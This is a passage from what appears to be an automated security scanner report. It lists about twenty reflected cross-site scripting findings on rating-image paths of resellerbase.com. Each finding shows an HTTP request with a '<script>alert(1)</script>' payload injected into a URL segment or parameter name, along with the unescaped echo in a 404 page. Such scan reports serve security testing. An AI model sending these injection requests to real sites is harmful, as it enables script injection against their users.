2.5150. http://www.resellerbase.com/web-service/other/themes/kosmos/images/rating/0.gif [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /web-service/other/themes/kosmos/images/rating/0.gif

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 89eb3<script>alert(1)</script>a4c843c4409 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /web-service/other89eb3<script>alert(1)</script>a4c843c4409/themes/kosmos/images/rating/0.gif HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Thu, 18 Nov 2010 00:48:23 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /web-service/other89eb3<script>alert(1)</script>a4c843c4409/themes/kosmos/images/rating/0.gif was not found on this server.</p>
...[SNIP]...

2.5151. http://www.resellerbase.com/web-service/other/themes/kosmos/images/rating/0.gif [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /web-service/other/themes/kosmos/images/rating/0.gif

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload 5cead<script>alert(1)</script>0bc52c6d8d5 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /web-service/other/themes5cead<script>alert(1)</script>0bc52c6d8d5/kosmos/images/rating/0.gif HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Thu, 18 Nov 2010 00:48:34 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /web-service/other/themes5cead<script>alert(1)</script>0bc52c6d8d5/kosmos/images/rating/0.gif was not found on this server.</p>
...[SNIP]...

2.5152. http://www.resellerbase.com/web-service/other/themes/kosmos/images/rating/0.gif [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /web-service/other/themes/kosmos/images/rating/0.gif

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload d70da<script>alert(1)</script>b8df7866d3d was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /web-service/other/themes/kosmosd70da<script>alert(1)</script>b8df7866d3d/images/rating/0.gif HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Thu, 18 Nov 2010 00:48:44 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /web-service/other/themes/kosmosd70da<script>alert(1)</script>b8df7866d3d/images/rating/0.gif was not found on this server.</p>
...[SNIP]...

2.5153. http://www.resellerbase.com/web-service/other/themes/kosmos/images/rating/0.gif [REST URL parameter 5]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /web-service/other/themes/kosmos/images/rating/0.gif

Issue detail

The value of REST URL parameter 5 is copied into the HTML document as plain text between tags. The payload 8c542<script>alert(1)</script>3c23b5f87cf was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /web-service/other/themes/kosmos/images8c542<script>alert(1)</script>3c23b5f87cf/rating/0.gif HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Thu, 18 Nov 2010 00:48:55 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /web-service/other/themes/kosmos/images8c542<script>alert(1)</script>3c23b5f87cf/rating/0.gif was not found on this server.</p>
...[SNIP]...

2.5154. http://www.resellerbase.com/web-service/other/themes/kosmos/images/rating/0.gif [REST URL parameter 6]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /web-service/other/themes/kosmos/images/rating/0.gif

Issue detail

The value of REST URL parameter 6 is copied into the HTML document as plain text between tags. The payload 969cc<script>alert(1)</script>70aad6c19db was submitted in the REST URL parameter 6. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /web-service/other/themes/kosmos/images/rating969cc<script>alert(1)</script>70aad6c19db/0.gif HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Thu, 18 Nov 2010 00:49:06 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /web-service/other/themes/kosmos/images/rating969cc<script>alert(1)</script>70aad6c19db/0.gif was not found on this server.</p>
...[SNIP]...

2.5155. http://www.resellerbase.com/web-service/other/themes/kosmos/images/rating/0.gif [REST URL parameter 7]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /web-service/other/themes/kosmos/images/rating/0.gif

Issue detail

The value of REST URL parameter 7 is copied into the HTML document as plain text between tags. The payload 6003e<script>alert(1)</script>4ff981d0da3 was submitted in the REST URL parameter 7. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /web-service/other/themes/kosmos/images/rating/0.gif6003e<script>alert(1)</script>4ff981d0da3 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Thu, 18 Nov 2010 00:49:23 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /web-service/other/themes/kosmos/images/rating/0.gif6003e<script>alert(1)</script>4ff981d0da3 was not found on this server.</p>
...[SNIP]...

2.5156. http://www.resellerbase.com/web-service/other/themes/kosmos/images/rating/0.gif [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /web-service/other/themes/kosmos/images/rating/0.gif

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload 59d55<script>alert(1)</script>73c8f7da9b9 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /web-service/other/themes/kosmos/images/rating/0.gif?59d55<script>alert(1)</script>73c8f7da9b9=1 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Thu, 18 Nov 2010 00:47:50 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /web-service/other/themes/kosmos/images/rating/0.gif?59d55<script>alert(1)</script>73c8f7da9b9=1 was not found on this server.</p>
...[SNIP]...

2.5157. http://www.resellerbase.com/web-service/other/themes/kosmos/images/rating/3.gif [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /web-service/other/themes/kosmos/images/rating/3.gif

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 3af6d<script>alert(1)</script>53585c243ba was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /web-service3af6d<script>alert(1)</script>53585c243ba/other/themes/kosmos/images/rating/3.gif HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Thu, 18 Nov 2010 00:47:59 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /web-service3af6d<script>alert(1)</script>53585c243ba/other/themes/kosmos/images/rating/3.gif was not found on this server.</p>
...[SNIP]...

2.5158. http://www.resellerbase.com/web-service/other/themes/kosmos/images/rating/3.gif [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /web-service/other/themes/kosmos/images/rating/3.gif

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 36683<script>alert(1)</script>74c03b9101f was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /web-service/other36683<script>alert(1)</script>74c03b9101f/themes/kosmos/images/rating/3.gif HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Thu, 18 Nov 2010 00:48:10 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /web-service/other36683<script>alert(1)</script>74c03b9101f/themes/kosmos/images/rating/3.gif was not found on this server.</p>
...[SNIP]...

2.5159. http://www.resellerbase.com/web-service/other/themes/kosmos/images/rating/3.gif [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /web-service/other/themes/kosmos/images/rating/3.gif

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload c3753<script>alert(1)</script>af6a1ade10 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /web-service/other/themesc3753<script>alert(1)</script>af6a1ade10/kosmos/images/rating/3.gif HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Thu, 18 Nov 2010 00:48:21 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /web-service/other/themesc3753<script>alert(1)</script>af6a1ade10/kosmos/images/rating/3.gif was not found on this server.</p>
...[SNIP]...

2.5160. http://www.resellerbase.com/web-service/other/themes/kosmos/images/rating/3.gif [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /web-service/other/themes/kosmos/images/rating/3.gif

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload 927c5<script>alert(1)</script>4d249f5e933 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /web-service/other/themes/kosmos927c5<script>alert(1)</script>4d249f5e933/images/rating/3.gif HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Thu, 18 Nov 2010 00:48:35 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /web-service/other/themes/kosmos927c5<script>alert(1)</script>4d249f5e933/images/rating/3.gif was not found on this server.</p>
...[SNIP]...

2.5161. http://www.resellerbase.com/web-service/other/themes/kosmos/images/rating/3.gif [REST URL parameter 5]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /web-service/other/themes/kosmos/images/rating/3.gif

Issue detail

The value of REST URL parameter 5 is copied into the HTML document as plain text between tags. The payload 37cde<script>alert(1)</script>f73e4a9bacb was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /web-service/other/themes/kosmos/images37cde<script>alert(1)</script>f73e4a9bacb/rating/3.gif HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Thu, 18 Nov 2010 00:48:46 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /web-service/other/themes/kosmos/images37cde<script>alert(1)</script>f73e4a9bacb/rating/3.gif was not found on this server.</p>
...[SNIP]...

2.5162. http://www.resellerbase.com/web-service/other/themes/kosmos/images/rating/3.gif [REST URL parameter 6]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /web-service/other/themes/kosmos/images/rating/3.gif

Issue detail

The value of REST URL parameter 6 is copied into the HTML document as plain text between tags. The payload 1e666<script>alert(1)</script>cd81e598e84 was submitted in the REST URL parameter 6. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /web-service/other/themes/kosmos/images/rating1e666<script>alert(1)</script>cd81e598e84/3.gif HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Thu, 18 Nov 2010 00:48:58 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /web-service/other/themes/kosmos/images/rating1e666<script>alert(1)</script>cd81e598e84/3.gif was not found on this server.</p>
...[SNIP]...

2.5163. http://www.resellerbase.com/web-service/other/themes/kosmos/images/rating/3.gif [REST URL parameter 7]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /web-service/other/themes/kosmos/images/rating/3.gif

Issue detail

The value of REST URL parameter 7 is copied into the HTML document as plain text between tags. The payload 8495f<script>alert(1)</script>d00b737739b was submitted in the REST URL parameter 7. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /web-service/other/themes/kosmos/images/rating/3.gif8495f<script>alert(1)</script>d00b737739b HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Thu, 18 Nov 2010 00:49:08 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /web-service/other/themes/kosmos/images/rating/3.gif8495f<script>alert(1)</script>d00b737739b was not found on this server.</p>
...[SNIP]...

2.5164. http://www.resellerbase.com/web-service/other/themes/kosmos/images/rating/3.gif [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /web-service/other/themes/kosmos/images/rating/3.gif

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload 28c13<script>alert(1)</script>a20e9d49670 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /web-service/other/themes/kosmos/images/rating/3.gif?28c13<script>alert(1)</script>a20e9d49670=1 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Thu, 18 Nov 2010 00:47:42 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /web-service/other/themes/kosmos/images/rating/3.gif?28c13<script>alert(1)</script>a20e9d49670=1 was not found on this server.</p>
...[SNIP]...

2.5165. http://www.resellerbase.com/web-service/other/themes/kosmos/images/rating/4.gif [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /web-service/other/themes/kosmos/images/rating/4.gif

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload d7366<script>alert(1)</script>2d38b550ba6 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /web-serviced7366<script>alert(1)</script>2d38b550ba6/other/themes/kosmos/images/rating/4.gif HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Thu, 18 Nov 2010 00:47:56 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /web-serviced7366<script>alert(1)</script>2d38b550ba6/other/themes/kosmos/images/rating/4.gif was not found on this server.</p>
...[SNIP]...

2.5166. http://www.resellerbase.com/web-service/other/themes/kosmos/images/rating/4.gif [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /web-service/other/themes/kosmos/images/rating/4.gif

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 605ad<script>alert(1)</script>143d813b2db was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /web-service/other605ad<script>alert(1)</script>143d813b2db/themes/kosmos/images/rating/4.gif HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Thu, 18 Nov 2010 00:48:12 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /web-service/other605ad<script>alert(1)</script>143d813b2db/themes/kosmos/images/rating/4.gif was not found on this server.</p>
...[SNIP]...

2.5167. http://www.resellerbase.com/web-service/other/themes/kosmos/images/rating/4.gif [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /web-service/other/themes/kosmos/images/rating/4.gif

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload 5cac4<script>alert(1)</script>e142e449d3e was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /web-service/other/themes5cac4<script>alert(1)</script>e142e449d3e/kosmos/images/rating/4.gif HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Thu, 18 Nov 2010 00:48:23 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /web-service/other/themes5cac4<script>alert(1)</script>e142e449d3e/kosmos/images/rating/4.gif was not found on this server.</p>
...[SNIP]...

2.5168. http://www.resellerbase.com/web-service/other/themes/kosmos/images/rating/4.gif [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /web-service/other/themes/kosmos/images/rating/4.gif

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload 8ac28<script>alert(1)</script>007929e17d2 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /web-service/other/themes/kosmos8ac28<script>alert(1)</script>007929e17d2/images/rating/4.gif HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Thu, 18 Nov 2010 00:48:37 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /web-service/other/themes/kosmos8ac28<script>alert(1)</script>007929e17d2/images/rating/4.gif was not found on this server.</p>
...[SNIP]...

2.5169. http://www.resellerbase.com/web-service/other/themes/kosmos/images/rating/4.gif [REST URL parameter 5]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /web-service/other/themes/kosmos/images/rating/4.gif

Issue detail

The value of REST URL parameter 5 is copied into the HTML document as plain text between tags. The payload 287b1<script>alert(1)</script>19ca3e5c80c was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.

